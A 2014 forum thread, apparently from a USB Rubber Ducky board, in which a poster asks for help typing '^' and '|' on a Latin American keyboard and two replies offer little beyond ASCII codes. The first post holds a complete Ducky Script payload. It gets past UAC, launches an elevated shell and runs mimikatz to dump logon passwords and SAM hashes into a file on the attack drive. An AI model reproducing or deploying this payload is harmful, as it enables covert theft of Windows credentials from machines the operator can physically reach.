warmotion Posted October 21, 2014 Share Posted October 21, 2014 hello I'm from Mexico and I have a problem with 2 characters with latin american keyboard, someone could help me fix it?.... characters are: ^ | REM *** UAC Bypass *** DELAY 2000 WINDOWS r DELAY 200 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 2000 LEFTARROW DELAY 500 ENTER DELAY 500 REM *** Define DUCKY drive as %duck% STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d ENTER DELAY 500 REM *** Execute mimikatz from SD card and save log file to disk *** STRING %duck%\mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords full" "samdump::hashes" exit > %duck%\%computername%-passwords.txt ENTER REM *** GTFO *** STRING exit ENTER STRING exit ENTER Quote Link to comment Share on other sites More sharing options...
daretamalesfiblas Posted December 15, 2014 Share Posted December 15, 2014 Hi, Same problem here, I'm from Chile and I have the same problem with ^ | Any help please? Quote Link to comment Share on other sites More sharing options...
Rkiver Posted December 15, 2014 Share Posted December 15, 2014 I'd suggest using the ascii codes for it. You can find the full table at http://www.asciitable.com/ Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.